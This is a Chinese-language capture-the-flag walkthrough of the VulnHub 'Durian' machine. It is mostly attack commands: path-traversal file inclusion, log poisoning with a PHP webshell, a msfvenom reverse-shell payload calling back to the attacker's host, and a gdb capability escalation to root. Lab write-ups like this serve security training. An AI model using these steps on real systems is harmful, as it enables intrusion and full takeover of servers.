靶机:durian
下载地址:Durian: 1 ~ VulnHub
实验机:kali 2020 windows 10
1.信息收集
1.nmap信息收集
sudo nmap -sS -sV -sC 10.7.184.0/24 //收集信息
得到信息
目标的ip:10.7.184.6
开启的端口和服务 22/tcp ssh , 80/tcp http ,8088/tcp radan-http
7080/tcp open ssl/empowerid LiteSpeed
2.漏洞端口漏洞探测
在kali中 使用searchsploit软件,搜索端口是否存在漏洞
sudo searchsploit OpenSSH 7.9p1
没有找到漏洞
3.http目录端口探测
在kali使用gobuster 进行目录探索
sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.7.184.6/ -x jsp
8088端口
sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.7.184.6:8088/ -x jsp
2.漏洞发现
1.目录探索
先探索8088端口,就只有一个登陆窗口,和OpenLiteSpeed 的用户手册好像没有用。
再探索一下80端口
http://10.7.184.6/cgi-data/getImage.php 查看源代码,发现有代码泄露,文件包含
通过应用参数file,实现访问,成功
http://10.7.184.6/cgi-data/getImage.php?file=../../../../../../etc/passwd
使用Wfuzz探测一下
3.漏洞利用
访问一下日志文件
http://10.7.184.6/cgi-data/getImage.php?file=/var/log/durian.log/access.log
可以进行文件包含,没有文件上传的地点,所以可以上传一句话木马到日志文件上,再进行包含
上传一句话木马,查看反显。插入成功
ps:命令的访问需要访问两次,才能显现
3.使用msf连接
在kali中创建一个shell.txt的payload文件
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.7.184.2 LPORT=9999 -f raw > shell.txt
在kali中打开监听:
python3 -m http.server 8888
使用burpsuit 下载文件shell到/var/www/html/blog/shell.php 文件下
打开msf 设置攻击模块,设置payload,注意这个payload必须和前面设置的一样。
然后run
然后在目标地址启动payload
http://10.7.184.6/blog/shell.php
最后在msf中 就可以成功连接
4.提权
1.linux提权
meterpreter > shell -t
www-data@durian:/var/www/html$ sudo -l
www-data@durian:/var/www/html$ getcap -r / 2>/dev/null
www-data@durian:/$ gdb -nx -ex 'python import os;os.setuid(0)' -ex '!bash' -ex quit
ok 成功提权